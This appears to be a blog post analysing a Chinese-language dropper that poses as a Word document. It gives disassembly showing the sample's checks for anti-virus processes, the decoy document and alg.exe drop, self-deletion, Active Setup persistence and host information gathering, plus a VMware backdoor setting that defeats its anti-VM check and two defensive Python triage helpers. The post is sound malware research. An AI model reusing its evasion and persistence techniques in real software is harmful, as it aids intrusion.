I went to company XXX for an interview and they gave me a sample to analyze on my own. In the end I never got a reply, so I guess there's no hope there. The sample has a lot of encrypted parts and is also anti-VM. My abilities are limited, so I could only do a rough functional analysis. Where it falls short, I hope the experts will point things out.
Reading through the code I found no code that checks the system for VMware-like services, processes or similar artifacts,
so I inferred that the detection probably uses the VMware backdoor interface. I therefore added monitor_control.restrict_backdoor = TRUE and disable_acceleration = TRUE to the virtual machine's configuration file to block the VMware backdoor. Running the sample again, it dropped a new file,
and that file ran and made network connections, a big change compared to the run before the backdoor was blocked. From this it can be concluded that the sample's virtual-machine detection was bypassed.
**********************************************************************************************************
The sample itself carries a Word icon so that it looks like a Word document. When the user double-clicks it, it enumerates the system's processes looking for avp.exe, 360tray.exe, KSafeSvc.exe and RsTray.exe,
and uses that to decide whether anti-virus software is running.
1. When anti-virus software is detected, it creates only one file, "请您按照表格填写资料.doc" ("please fill in the information according to the form"), saved as C:\DOCUME~1\AYL\LOCALS~1\Temp\请您按照表格填写资料.doc,
then launches "请您按照表格填写资料.doc" so that the user believes a genuine Word document has been opened.
2. When no anti-virus software is detected, it creates "请您按照表格填写资料.doc" and opens it, and at the same time creates "alg.exe", saved as C:\DOCUME~1\AYL\LOCALS~1\Temp\alg.exe,
then creates a batch file hostfix.bat, likewise saved as C:\DOCUME~1\AYL\LOCALS~1\Temp\hostfix.bat. Finally the malware runs hostfix.bat to delete itself.
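To turn the two branches above into something usable at triage time, here is an added Python helper (not code from the sample or from this post) that emulates the check: given a process listing, it reports which of the four names the sample would hit first and which files a run should leave behind. The process names, their test order and the file paths come from the analysis above; the tasklist-style listings at the bottom are constructed input.

```python
"""Predict which branch of the sample a given host will take.

Added example for this write-up, not code from the sample or the original post.
The four process names, the order they are tested in and the dropped-file paths
are taken from the analysis above; the process listings at the bottom are
constructed input in `tasklist` style.
"""
import re

# Names the sample looks for, in the order the disassembly tests them.
AV_PROCESS_NAMES = ("avp.exe", "360tray.exe", "KSafeSvc.exe", "RsTray.exe")

# Paths observed on the analyst's machine (GetTempPathW returned this Temp directory).
DECOY_DOC = r"C:\DOCUME~1\AYL\LOCALS~1\Temp\请您按照表格填写资料.doc"
DROPPER_EXE = r"C:\DOCUME~1\AYL\LOCALS~1\Temp\alg.exe"
SELF_DELETE_BAT = r"C:\DOCUME~1\AYL\LOCALS~1\Temp\hostfix.bat"


def first_av_match(process_names):
    """Return the first watched name that is running, or None.

    The sample tests the names one after another and leaves the routine on the
    first hit, so only the first match in AV_PROCESS_NAMES order is reported.
    """
    running = {p.strip().lower() for p in process_names}
    for name in AV_PROCESS_NAMES:
        if name.lower() in running:
            return name
    return None


def predict_behaviour(process_names):
    """Return the branch the sample takes and the files a run should leave behind."""
    hit = first_av_match(process_names)
    if hit is not None:
        # AV present: only the decoy document is written and opened.
        return {"branch": "decoy_only", "trigger": hit, "artifacts": [DECOY_DOC]}
    # No AV: decoy plus alg.exe, then hostfix.bat deletes the original sample.
    return {
        "branch": "full_payload",
        "trigger": None,
        "artifacts": [DECOY_DOC, DROPPER_EXE, SELF_DELETE_BAT],
    }


def parse_tasklist(text):
    """Pull image names out of `tasklist`-style output (first column, *.exe only)."""
    names = []
    for line in text.splitlines():
        m = re.match(r"(\S+\.exe)\b", line.strip(), re.IGNORECASE)
        if m:
            names.append(m.group(1))
    return names


# Constructed listings: a sandbox that runs a security product, and a clean one.
LISTING_WITH_AV = """\
Image Name                     PID Session Name
System                           4 Services
explorer.exe                  1234 Console
360tray.exe                   2345 Console
"""
LISTING_CLEAN = """\
explorer.exe                  1234 Console
WINWORD.EXE                   3456 Console
"""

if __name__ == "__main__":
    for label, listing in (("with AV", LISTING_WITH_AV), ("clean", LISTING_CLEAN)):
        print(label, predict_behaviour(parse_tasklist(listing)))
```

The order matters because every match in the disassembly ends with a jmp to 00402036, so the routine never looks further than the first hit. The practical consequence for a sandbox is that any of these four image names being present, even as a stub, means only the decoy .doc will ever appear and the alg.exe drop will never be observed.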
When the sample runs it modifies the registry, adding cr.sa.exe (presumably the malware itself) and alg.exe under Registry\Machine\SOFTWARE\Microsoft\Active Setup\Installed Components\,
disguised as system components, so that they are run before the system has started up and thus evade detection by the anti-virus software.
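The Active Setup persistence described above is straightforward to audit. The following Python script is an added example (not part of the original post or of the sample): it walks every Installed Components subkey with its StubPath and flags commands whose executable lives in a Temp directory or outside the Windows and Program Files trees. The trusted-root list, the Temp markers and the constructed entries are assumptions made for this example; the alg.exe path is the one reported in the analysis, and the GUIDs are placeholders because the real subkey name in the listing is truncated.

```python
"""Audit Active Setup "Installed Components" StubPath values.

Added example for this write-up, not code from the sample or the original post.
The sample registers cr.sa.exe and alg.exe under
HKLM\\SOFTWARE\\Microsoft\\Active Setup\\Installed Components\\{GUID}; this script
flags StubPath commands whose executable sits in a Temp directory or outside the
Windows / Program Files trees.  On Windows it reads the live registry via winreg;
elsewhere it runs over an exported (subkey, StubPath) list.
"""
import ntpath
import re
import sys

ACTIVE_SETUP_KEY = r"SOFTWARE\Microsoft\Active Setup\Installed Components"

# Roots a legitimate StubPath is expected to live under (assumption for this example).
TRUSTED_PREFIXES = (r"c:\windows", r"c:\program files")
# Directory names that indicate a temp location; LOCALS~1 is the 8.3 form of
# "Local Settings" seen in the write-up's C:\DOCUME~1\AYL\LOCALS~1\Temp\ path.
TEMP_MARKERS = ("temp", "tmp", "locals~1")


def expand_windows_vars(s):
    """Expand the %SystemRoot%/%windir% forms Windows uses in StubPath (assumed C:\\Windows)."""
    return re.sub(r"%(systemroot|windir)%", lambda m: r"C:\Windows", s, flags=re.I)


def executable_from_stubpath(stubpath):
    """Return the executable part of a StubPath command line."""
    s = expand_windows_vars(stubpath.strip())
    if s.startswith('"'):                      # quoted path: take up to the closing quote
        end = s.find('"', 1)
        return s[1:end] if end > 0 else s[1:]
    tokens = s.split()
    acc = ""
    for tok in tokens:                         # unquoted path with spaces: grow until ".exe"
        acc = tok if not acc else acc + " " + tok
        if acc.lower().endswith(".exe"):
            return acc
    return tokens[0] if tokens else ""


def is_suspicious_stubpath(stubpath):
    """Heuristic: executable in a Temp directory, or outside the trusted roots."""
    exe = ntpath.normpath(executable_from_stubpath(stubpath)).lower()
    if not exe or ("\\" not in exe and "/" not in exe):
        return False                           # bare image name resolved by the loader; out of scope here
    parts = [p for p in exe.split("\\") if p]
    if any(p in TEMP_MARKERS for p in parts):
        return True
    return not exe.startswith(TRUSTED_PREFIXES)


def audit_entries(entries):
    """entries: iterable of (subkey, stubpath). Returns the suspicious pairs."""
    return [(sub, stub) for sub, stub in entries if stub and is_suspicious_stubpath(stub)]


def read_live_entries():
    """Collect (subkey, StubPath) pairs from HKLM; Windows only."""
    import winreg  # imported here so the module still loads on other platforms
    out = []
    with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, ACTIVE_SETUP_KEY) as root:
        i = 0
        while True:
            try:
                sub = winreg.EnumKey(root, i)
            except OSError:
                break
            i += 1
            try:
                with winreg.OpenKey(root, sub) as k:
                    stub = winreg.QueryValueEx(k, "StubPath")[0]
            except OSError:
                stub = None                    # many components carry no StubPath at all
            out.append((sub, stub))
    return out


# Constructed entries: two Windows-style stubs and one modelled on the sample's alg.exe drop.
# The GUIDs are placeholders; the subkey name in the disassembly is truncated.
SAMPLE_ENTRIES = [
    ("{GUID-PLACEHOLDER-REGSVR}", r"regsvr32.exe /s /n /i:U shell32.dll"),
    ("{GUID-PLACEHOLDER-RUNDLL}", r"%SystemRoot%\system32\rundll32.exe shell32.dll,Control_RunDLL"),
    ("{GUID-PLACEHOLDER-SAMPLE}", r"C:\DOCUME~1\AYL\LOCALS~1\Temp\alg.exe"),
]

if __name__ == "__main__":
    entries = read_live_entries() if sys.platform == "win32" else SAMPLE_ENTRIES
    for sub, stub in audit_entries(entries):
        print("SUSPICIOUS", sub, stub)
```

A path heuristic like this catches the Temp-directory drop but not a binary copied into the Windows tree under a system-looking name such as cr.sa.exe, so on a real host pair it with a signature or hash check of each StubPath executable.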
It obtains C: drive information via kernel32.GetVolumeInformationA
and the local network adapter and IP information via iphlpapi.GetAdaptersInfo, and writes this data into the generated alg.exe for use when it connects to the network.
Many important parts of this sample are encrypted; since my skills are not that good I could not analyze them one by one, so I am only posting some of the key code.
**********************************************************************************************************
00402897 . 8965 E8 mov dword ptr ss:[ebp-0x18],esp
0040289A . C745 E4 00000>mov dword ptr ss:[ebp-0x1C],0x0
004028A1 . B9 06000000 mov ecx,0x6
004028A6 . BE 2CC54000 mov esi,sample(?0040C52C ; UNICODE "hostfix.bat"
004028AB . 8D7D CC lea edi,dword ptr ss:[ebp-0x34]
004028AE . F3:A5 rep movs dword ptr es:[edi],dword ptr ds:[esi]
004028B0 . E8 76F0FFFF call sample(?0040192B
004028B5 . E8 E2EFFFFF call sample(?0040189C ; open the sample file, read its contents, return the CreateProcessW handle
004028BA . E8 9AF6FFFF call sample(?00401F59 ; check whether an anti-virus process exists
004028BF > A1 5CD84000 mov eax,dword ptr ds:[0x40D85C]
004028C4 . 8378 18 00 cmp dword ptr ds:[eax+0x18],0x0
004028C8 . 74 16 je Xsample(?004028E0
004028CA . 68 384A0000 push 0x4A38
004028CF . E8 DF120000 call sample(?00403BB3
004028D4 . 83C4 04 add esp,0x4
004028D7 . 8B0D 5CD84000 mov ecx,dword ptr ds:[0x40D85C]
004028DD . FF51 18 call dword ptr ds:[ecx+0x18]
004028E0 > 33D2 xor edx,edx
004028E2 . 85D2 test edx,edx
004028E4 .^ 75 D9 jnz Xsample(?004028BF
004028E6 . E8 11F1FFFF call sample(?004019FC ; create and open the file
004028EB > A1 5CD84000 mov eax,dword ptr ds:[0x40D85C]
**********************************************************************************************************
Check whether an anti-virus program is running
004028BA . E8 9AF6FFFF call sample(?00401F59 ; check whether an anti-virus process exists
***********************************************************************************************************
00401F59 /$ 55 push ebp
00401F5A |. 8BEC mov ebp,esp
00401F5C |. 51 push ecx
00401F5D |. C745 FC 00000>mov [local.1],0x0
00401F64 |. E8 17100000 call sample(?00402F80 ; retrieve the specified system information
00401F69 |. 8945 FC mov [local.1],eax
00401F6C |. 68 18C34000 push sample(?0040C318 ; ASCII "avp.exe"
00401F71 |. 8B45 FC mov eax,[local.1]
00401F74 |. 50 push eax
00401F75 |. E8 61110000 call sample(?004030DB
00401F7A |. 83C4 08 add esp,0x8
00401F7D |. 85C0 test eax,eax
00401F7F |. 74 11 je Xsample(?00401F92
00401F81 |. 8B0D 60D84000 mov ecx,dword ptr ds:[0x40D860]
00401F87 |. 890D 60D84000 mov dword ptr ds:[0x40D860],ecx
00401F8D |. E9 A4000000 jmp sample(?00402036
00401F92 |> 6A 1F push 0x1F
00401F94 |. E8 D8140000 call sample(?00403471
00401F99 |. 83C4 04 add esp,0x4
00401F9C |. 50 push eax
00401F9D |. 8B55 FC mov edx,[local.1]
00401FA0 |. 52 push edx
00401FA1 |. E8 35110000 call sample(?004030DB ; check for 360tray.exe
00401FA6 |. 83C4 08 add esp,0x8
00401FA9 |. 85C0 test eax,eax
00401FAB |. 74 18 je Xsample(?00401FC5
00401FAD |. 6A 1F push 0x1F
00401FAF |. E8 2C140000 call sample(?004033E0
00401FB4 |. 83C4 04 add esp,0x4
00401FB7 |. A1 60D84000 mov eax,dword ptr ds:[0x40D860]
00401FBC |. 0C 01 or al,0x1
00401FBE |. A3 60D84000 mov dword ptr ds:[0x40D860],eax
00401FC3 |. EB 71 jmp Xsample(?00402036
00401FC5 |> 6A 20 push 0x20
00401FC7 |. E8 A5140000 call sample(?00403471
00401FCC |. 83C4 04 add esp,0x4
00401FCF |. 50 push eax
00401FD0 |. 8B4D FC mov ecx,[local.1]
00401FD3 |. 51 push ecx
00401FD4 |. E8 02110000 call sample(?004030DB ; check for KSafeSvc.exe
00401FD9 |. 83C4 08 add esp,0x8
00401FDC |. 85C0 test eax,eax
00401FDE |. 74 1B je Xsample(?00401FFB
00401FE0 |. 6A 20 push 0x20
00401FE2 |. E8 F9130000 call sample(?004033E0
00401FE7 |. 83C4 04 add esp,0x4
00401FEA |. 8B15 60D84000 mov edx,dword ptr ds:[0x40D860]
00401FF0 |. 83CA 02 or edx,0x2
00401FF3 |. 8915 60D84000 mov dword ptr ds:[0x40D860],edx
00401FF9 |. EB 3B jmp Xsample(?00402036
00401FFB |> 6A 21 push 0x21
00401FFD |. E8 6F140000 call sample(?00403471
00402002 |. 83C4 04 add esp,0x4
00402005 |. 50 push eax
00402006 |. 8B45 FC mov eax,[local.1]
00402009 |. 50 push eax
0040200A |. E8 CC100000 call sample(?004030DB ; check for RsTray.exe
0040200F |. 83C4 08 add esp,0x8
00402012 |. 85C0 test eax,eax
**********************************************************************************************************
Create and open the file (function at 004019FC, called at 004028E6)
004019FF |. 81EC 1C060000 sub esp,0x61C
00401A05 |> 6A 24 /push 0x24
00401A07 |. E8 651A0000 |call sample(?00403471 ; get the string "ShellExecuteW"
00401A0C |. 83C4 04 |add esp,0x4
00401A0F |. 50 |push eax
00401A10 |. 6A 22 |push 0x22
00401A12 |. E8 5A1A0000 |call sample(?00403471 ; get the string "Shell32.dll"
00401A17 |. 83C4 04 |add esp,0x4
00401A1A |. 50 |push eax ; |/FileName
00401A1B |. FF15 28B04000 |call dword ptr ds:[<&KERNEL32.LoadLibraryA>] ; |\LoadLibraryA
00401A21 |. 50 |push eax ; |hModule
00401A22 |. FF15 24B04000 |call dword ptr ds:[<&KERNEL32.GetProcAddress>] ; \GetProcAddress
00401A28 |. A3 58D84000 |mov dword ptr ds:[0x40D858],eax
00401A2D |. 833D 58D84000>|cmp dword ptr ds:[0x40D858],0x0 ; got the address of ShellExecuteW
00401A34 |. 75 15 |jnz Xsample(?00401A4B
00401A36 |. 68 88C24000 |push sample(?0040C288 ; ASCII "GetProcAddress"
00401A3B |. E8 3A1C0000 |call sample(?0040367A
00401A40 |. 83C4 04 |add esp,0x4
00401A43 |. 8985 E4F9FFFF |mov [local.391],eax
00401A49 |. EB 0A |jmp Xsample(?00401A55
00401A4B |> C785 E4F9FFFF>|mov [local.391],0x1
00401A55 |> 6A 22 |push 0x22
00401A57 |. E8 84190000 |call sample(?004033E0
00401A5C |. 83C4 04 |add esp,0x4
00401A5F |. 6A 24 |push 0x24
00401A61 |. E8 7A190000 |call sample(?004033E0
00401A66 |. 83C4 04 |add esp,0x4
00401A69 |. 33C0 |xor eax,eax
00401A6B |. 85C0 |test eax,eax
00401A6D |.^ 75 96 \jnz Xsample(?00401A05
00401A6F |. 8D8D E8F9FFFF lea ecx,[local.390]
00401A75 |. 51 push ecx ; /Buffer
00401A76 |. 68 04010000 push 0x104 ; |BufSize = 104 (260.)
00401A7B |. FF15 30B04000 call dword ptr ds:[<&KERNEL32.GetTempPathW>] ; \GetTempPathW
00401A81 |. 85C0 test eax,eax ; got the temp directory C:\DOCUME~1\AYL\LOCALS~1\Temp\
00401A83 |. 75 07 jnz Xsample(?00401A8C
00401A85 |. 6A 00 push 0x0
00401A87 |. E8 952F0000 call sample(?00404A21
00401A8C |> 68 04254100 push sample(?00412504
00401A91 |. 8D95 F8FDFFFF lea edx,[local.130]
00401A97 |. 52 push edx
00401A98 |. 8D85 E8F9FFFF lea eax,[local.390]
00401A9E |. 50 push eax
00401A9F |. E8 C7F5FFFF call sample(?0040106B ; C:\DOCUME~1\AYL\LOCALS~1\Temp\请您按照表格填写资料.doc
00401AA4 |. 83C4 0C add esp,0xC
00401AA7 |. 68 14254100 push sample(?00412514
00401AAC |. 8D8D F8FDFFFF lea ecx,[local.130]
00401AB2 |. 51 push ecx
00401AB3 |. 68 04254100 push sample(?00412504
00401AB8 |. 8B15 50D84000 mov edx,dword ptr ds:[0x40D850]
00401ABE |. 52 push edx
00401ABF |. E8 1FFAFFFF call sample(?004014E3 ; create the file 请您按照表格填写资料.doc
00401AC4 |. 83C4 10 add esp,0x10
00401AC7 |. 85C0 test eax,eax
**********************************************************************************************************
Create the file
00401ABF |. E8 1FFAFFFF call sample(?004014E3 ; create the file 请您按照表格填写资料.doc
**********************************************************************************************************
00401559 |. 8B51 04 mov edx,dword ptr ds:[ecx+0x4]
0040155C |. 8955 E0 mov [local.8],edx
0040155F |. 6A 00 push 0x0 ; /hTemplateFile = NULL
00401561 |. 6A 00 push 0x0 ; |Attributes = 0
00401563 |. 6A 02 push 0x2 ; |Mode = CREATE_ALWAYS
00401565 |. 6A 00 push 0x0 ; |pSecurity = NULL
00401567 |. 6A 03 push 0x3 ; |ShareMode = FILE_SHARE_READ|FILE_SHARE_WRITE
00401569 |. 68 00000040 push 0x40000000 ; |Access = GENERIC_WRITE
0040156E |. 8B45 10 mov eax,[arg.3] ; |
00401571 |. 50 push eax ; |FileName
00401572 |. FF15 20B04000 call dword ptr ds:[<&KERNEL32.CreateFileW>] ; \CreateFileW
00401578 |. 8985 D4FDFFFF mov [local.139],eax ; created the file 请您按照表格填写资料.doc
0040157E |. 83BD D4FDFFFF>cmp [local.139],-0x1
00401585 |. 75 18 jnz Xsample(?0040159F
00401587 |. 8B4D 10 mov ecx,[arg.3]
0040158A |. 51 push ecx
0040158B |. 68 E0C04000 push sample(?0040C0E0 ; UNICODE "path = %ls\n"
00401590 |. E8 2E340000 call sample(?004049C3
00401595 |. 83C4 08 add esp,0x8
00401598 |. 33C0 xor eax,eax
0040159A |. E9 F9020000 jmp sample(?00401898
0040159F |> 6A 00 push 0x0 ; /Origin = FILE_BEGIN
004015A1 |. 6A 00 push 0x0 ; |pOffsetHi = NULL
004015A3 |. 8B55 0C mov edx,[arg.2] ; |
004015A6 |. 8B02 mov eax,dword ptr ds:[edx] ; |
004015A8 |. 50 push eax ; |OffsetLo
004015A9 |. 8B4D 08 mov ecx,[arg.1] ; |
004015AC |. 51 push ecx ; |hFile
004015AD |. FF15 1CB04000 call dword ptr ds:[<&KERNEL32.SetFilePointer>] ; \SetFilePointer
004015B3 |. 8945 EC mov [local.5],eax
……
00401602 |. 8985 CCFDFFFF mov [local.141],eax
00401608 |. 83BD CCFDFFFF>cmp [local.141],0x0
0040160F |. 75 07 jnz Xsample(?00401618
00401611 |. 33C0 xor eax,eax
00401613 |. E9 80020000 jmp sample(?00401898
00401618 |> 6A 00 push 0x0 ; /pOverlapped = NULL
0040161A |. 8D55 F0 lea edx,[local.4] ; |
0040161D |. 52 push edx ; |pBytesRead
0040161E |. 8B45 E0 mov eax,[local.8] ; |
00401621 |. 50 push eax ; |BytesToRead
00401622 |. 8B8D D0FDFFFF mov ecx,[local.140] ; |
00401628 |. 51 push ecx ; |Buffer
00401629 |. 8B55 08 mov edx,[arg.1] ; |
0040162C |. 52 push edx ; |hFile
0040162D |. FF15 18B04000 call dword ptr ds:[<&KERNEL32.ReadFile>] ; \ReadFile
00401633 |. 85C0 test eax,eax
00401635 |. 75 07 jnz Xsample(?0040163E
……
00401832 |. 83C4 0C add esp,0xC ; write the file
00401835 |> 6A 00 push 0x0 ; /pOverlapped = NULL
00401837 |. 8D4D F0 lea ecx,[local.4] ; |
0040183A |. 51 push ecx ; |pBytesWritten
0040183B |. 8B55 0C mov edx,[arg.2] ; |
0040183E |. 8B42 08 mov eax,dword ptr ds:[edx+0x8] ; |
00401841 |. 50 push eax ; |nBytesToWrite
00401842 |. 8B8D CCFDFFFF mov ecx,[local.141] ; |
00401848 |. 51 push ecx ; |Buffer
00401849 |. 8B95 D4FDFFFF mov edx,[local.139] ; |
0040184F |. 52 push edx ; |hFile
00401850 |. FF15 14B04000 call dword ptr ds:[<&KERNEL32.WriteFile>] ; \WriteFile
00401856 |. 85C0 test eax,eax
**********************************************************************************************************
Open the created file "请您按照表格填写资料.doc" in edit mode (ShellExecuteW with the "edit" verb)
00401AF3 |. 8D95 F8FDFFFF lea edx,[local.130]
00401AF9 |. 52 push edx
00401AFA |. 68 CCC24000 push sample(?0040C2CC ; UNICODE "edit"
00401AFF |. 6A 00 push 0x0
00401B01 |. FF15 58D84000 call dword ptr ds:[0x40D858]
00401B07 |. 83C4 18 add esp,0x18 ; open the created file
00401B0A |. 8BE5 mov esp,ebp
00401B0C |. 5D pop ebp
Get the name of the file to be generated: "C:\DOCUME~1\AYL\LOCALS~1\Temp\alg.exe"
**********************************************************************************************************
00401B33 . 57 push edi
00401B34 . 8965 E8 mov dword ptr ss:[ebp-0x18],esp
00401B37 . 8D85 C8F8FFFF lea eax,dword ptr ss:[ebp-0x738]
00401B3D . 50 push eax ; /Buffer
00401B3E . 68 04010000 push 0x104 ; |BufSize = 104 (260.)
00401B43 . FF15 30B04000 call dword ptr ds:[<&KERNEL32.GetTempPathW>] ; \GetTempPathW
00401B49 . 85C0 test eax,eax
00401B4B . 75 07 jnz Xsample(?00401B54
00401B4D . 6A 00 push 0x0
00401B4F . E8 CD2E0000 call sample(?00404A21
00401B54 > 68 E0234100 push sample(?004123E0
00401B59 . 8D8D D0FAFFFF lea ecx,dword ptr ss:[ebp-0x530]
00401B5F . 51 push ecx
00401B60 . 8D95 C8F8FFFF lea edx,dword ptr ss:[ebp-0x738]
00401B66 . 52 push edx
00401B67 . E8 FFF4FFFF call sample(?0040106B ; get the name of the file to be generated: "C:\DOCUME~1\AYL\LOCALS~1\Temp\alg.exe"
00401B6C . 83C4 0C add esp,0xC
……
0040107E |. 50 push eax
0040107F |. E8 7C310000 call sample(?00404200 ; _memset
00401084 |. 83C4 0C add esp,0xC
00401087 |. 68 08020000 push 0x208
0040108C |. 6A 00 push 0x0
0040108E |. 8D8D F8FDFFFF lea ecx,[local.130]
00401094 |. 51 push ecx
00401095 |. E8 66310000 call sample(?00404200 ; _memset
0040109A |. 83C4 0C add esp,0xC
0040109D |. 68 04010000 push 0x104
004010A2 |. 8B55 08 mov edx,[arg.1]
004010A5 |. 52 push edx
004010A6 |. 8B45 0C mov eax,[arg.2]
004010A9 |. 50 push eax
004010AA |. E8 0C310000 call sample(?004041BB ; _wcsncpy
004010AF |. 83C4 0C add esp,0xC
004010B2 |. 68 04010000 push 0x104 ; /WideBufSize = 104 (260.)
004010B7 |. 8D8D F8FDFFFF lea ecx,[local.130] ; |
004010BD |. 51 push ecx ; |WideCharBuf
004010BE |. 6A FF push -0x1 ; |StringSize = FFFFFFFF (-1.)
004010C0 |. 8B55 10 mov edx,[arg.3] ; |
004010C3 |. 83C2 20 add edx,0x20 ; |
004010C6 |. 52 push edx ; |StringToMap
004010C7 |. 6A 00 push 0x0 ; |Options = 0
004010C9 |. 6A 00 push 0x0 ; |CodePage = CP_ACP
004010CB |. FF15 08B04000 call dword ptr ds:[<&KERNEL32.MultiByteToWideChar>] ; \MultiByteToWideChar
004010D1 |. 8D85 F8FDFFFF lea eax,[local.130] ; eax = alg.exe
004010D7 |. 50 push eax ; /StringToAdd
004010D8 |. 8B4D 0C mov ecx,[arg.2] ; |
004010DB |. 51 push ecx ; |ConcatString
004010DC |. FF15 04B04000 call dword ptr ds:[<&KERNEL32.lstrcatW>] ; \lstrcatW
004010E2 |. 8BE5 mov esp,ebp
004010E4 |. 5D pop ebp
004010E5 \. C3 retn
**********************************************************************************************************
Create the file alg.exe
**********************************************************************************************************
00401556 |. 8B4D 0C mov ecx,[arg.2] ; sample(?004123E0
00401559 |. 8B51 04 mov edx,dword ptr ds:[ecx+0x4]
0040155C |. 8955 E0 mov [local.8],edx
0040155F |. 6A 00 push 0x0 ; /hTemplateFile = NULL
00401561 |. 6A 00 push 0x0 ; |Attributes = 0
00401563 |. 6A 02 push 0x2 ; |Mode = CREATE_ALWAYS
00401565 |. 6A 00 push 0x0 ; |pSecurity = NULL
00401567 |. 6A 03 push 0x3 ; |ShareMode = FILE_SHARE_READ|FILE_SHARE_WRITE
00401569 |. 68 00000040 push 0x40000000 ; |Access = GENERIC_WRITE
0040156E |. 8B45 10 mov eax,[arg.3] ; |
00401571 |. 50 push eax ; |FileName
00401572 |. FF15 20B04000 call dword ptr ds:[<&KERNEL32.CreateFileW>] ; \CreateFileW
00401578 |. 8985 D4FDFFFF mov [local.139],eax ; created the file alg.exe
0040157E |. 83BD D4FDFFFF>cmp [local.139],-0x1
00401585 |. 75 18 jnz Xsample(?0040159F
00401587 |. 8B4D 10 mov ecx,[arg.3]
……
Set the file pointer
0040159F |> \6A 00 push 0x0 ; /Origin = FILE_BEGIN
004015A1 |. 6A 00 push 0x0 ; |pOffsetHi = NULL
004015A3 |. 8B55 0C mov edx,[arg.2] ; |
004015A6 |. 8B02 mov eax,dword ptr ds:[edx] ; |
004015A8 |. 50 push eax ; |OffsetLo
004015A9 |. 8B4D 08 mov ecx,[arg.1] ; |
004015AC |. 51 push ecx ; |hFile
004015AD |. FF15 1CB04000 call dword ptr ds:[<&KERNEL32.SetFilePointer>] ; \SetFilePointer
004015B3 |. 8945 EC mov [local.5],eax
004015B6 |. 837D EC FF cmp [local.5],-0x1
004015BA |. 75 07 jnz Xsample(?004015C3
……
Read the file
00401611 |. 33C0 xor eax,eax
00401613 |. E9 80020000 jmp sample(?00401898
00401618 |> 6A 00 push 0x0 ; /pOverlapped = NULL
0040161A |. 8D55 F0 lea edx,[local.4] ; |
0040161D |. 52 push edx ; |pBytesRead
0040161E |. 8B45 E0 mov eax,[local.8] ; |
00401621 |. 50 push eax ; |BytesToRead
00401622 |. 8B8D D0FDFFFF mov ecx,[local.140] ; |
00401628 |. 51 push ecx ; |Buffer
00401629 |. 8B55 08 mov edx,[arg.1] ; |
0040162C |. 52 push edx ; |hFile
0040162D |. FF15 18B04000 call dword ptr ds:[<&KERNEL32.ReadFile>] ; \ReadFile
00401633 |. 85C0 test eax,eax
************************************************************************************************************
Get C: drive information
************************************************************************************************************
00403874 |. C745 FC 00000>mov [local.1],0x0
0040387B |. C785 ECFEFFFF>mov [local.69],0x0
00403885 |. C785 F0FEFFFF>mov [local.68],-0x1
0040388F |> 6A 05 /push 0x5
00403891 |. E8 DBFBFFFF |call sample(?00403471 ; GetVolumeInformationA
00403896 |. 83C4 04 |add esp,0x4
00403899 |. 50 |push eax
0040389A |. 6A 02 |push 0x2
0040389C |. E8 D0FBFFFF |call sample(?00403471 ; Kernel32.dll
004038A1 |. 83C4 04 |add esp,0x4
004038A4 |. 50 |push eax ; |/FileName
004038A5 |. FF15 28B04000 |call dword ptr ds:[<&KERNEL32.LoadLibraryA>] ; |\LoadLibraryA
004038AB |. 50 |push eax ; |hModule
004038AC |. FF15 24B04000 |call dword ptr ds:[<&KERNEL32.GetProcAddress>] ; \GetProcAddress
004038B2 |. A3 CCD84000 |mov dword ptr ds:[0x40D8CC],eax
004038B7 |. 833D CCD84000>|cmp dword ptr ds:[0x40D8CC],0x0
004038BE |. 75 15 |jnz Xsample(?004038D5
004038C0 |. 68 ECCC4000 |push sample(?0040CCEC ; ASCII "GetProcAddress"
004038C5 |. E8 B0FDFFFF |call sample(?0040367A
004038CA |. 83C4 04 |add esp,0x4
004038CD |. 8985 DCFDFFFF |mov [local.137],eax
004038D3 |. EB 0A |jmp Xsample(?004038DF
004038D5 |> C785 DCFDFFFF>|mov [local.137],0x1
004038DF |> 6A 02 |push 0x2
004038E1 |. E8 FAFAFFFF |call sample(?004033E0
004038E6 |. 83C4 04 |add esp,0x4
004038E9 |. 6A 05 |push 0x5
004038EB |. E8 F0FAFFFF |call sample(?004033E0
004038F0 |. 83C4 04 |add esp,0x4
004038F3 |. 33C0 |xor eax,eax
004038F5 |. 85C0 |test eax,eax
004038F7 |.^ 75 96 \jnz Xsample(?0040388F
004038F9 |. 68 05010000 push 0x105
004038FE |. 8D8D F4FEFFFF lea ecx,[local.67]
00403904 |. 51 push ecx
00403905 |. 8D95 ECFEFFFF lea edx,[local.69]
0040390B |. 52 push edx
0040390C |. 8D45 FC lea eax,[local.1]
0040390F |. 50 push eax
00403910 |. 8D8D E8FEFFFF lea ecx,[local.70]
00403916 |. 51 push ecx
00403917 |. 68 05010000 push 0x105
0040391C |. 8D95 E0FDFFFF lea edx,[local.136]
00403922 |. 52 push edx
00403923 |. 68 FCCC4000 push sample(?0040CCFC ; ASCII "C:\"
00403928 |. FF15 CCD84000 call dword ptr ds:[0x40D8CC] ; kernel32.GetVolumeInformationA
0040392E |. 8985 F0FEFFFF mov [local.68],eax
00403934 |. 8B85 E8FEFFFF mov eax,[local.70] ; the variable that receives the volume serial number
Get local network adapter information, in preparation for alg.exe's network connection later
00403947 |. E8 F41A0000 call sample(?00405440 ; __alloca_probe
0040394C |. 8D85 FCD7FFFF lea eax,[local.2561]
00403952 |. 8945 FC mov [local.1],eax
00403955 |. C785 F4D7FFFF>mov [local.2563],0x2800
0040395F |> 6A 06 /push 0x6
00403961 |. E8 0BFBFFFF |call sample(?00403471 ; GetAdaptersInfo
00403966 |. 83C4 04 |add esp,0x4
00403969 |. 50 |push eax
0040396A |. 6A 03 |push 0x3
0040396C |. E8 00FBFFFF |call sample(?00403471 ; Iphlpapi.dll
00403971 |. 83C4 04 |add esp,0x4
00403974 |. 50 |push eax ; |/FileName
00403975 |. FF15 28B04000 |call dword ptr ds:[<&KERNEL32.LoadLibraryA>] ; |\LoadLibraryA
0040397B |. 50 |push eax ; |hModule
0040397C |. FF15 24B04000 |call dword ptr ds:[<&KERNEL32.GetProcAddress>] ; \GetProcAddress
00403982 |. A3 D0D84000 |mov dword ptr ds:[0x40D8D0],eax
00403987 |. 833D D0D84000>|cmp dword ptr ds:[0x40D8D0],0x0
0040398E |. 75 15 |jnz Xsample(?004039A5
00403990 |. 68 00CD4000 |push sample(?0040CD00 ; ASCII "GetProcAddress"
00403995 |. E8 E0FCFFFF |call sample(?0040367A
0040399A |. 83C4 04 |add esp,0x4
0040399D |. 8985 F0D7FFFF |mov [local.2564],eax
004039A3 |. EB 0A |jmp Xsample(?004039AF
004039A5 |> C785 F0D7FFFF>|mov [local.2564],0x1
004039AF |> 6A 03 |push 0x3
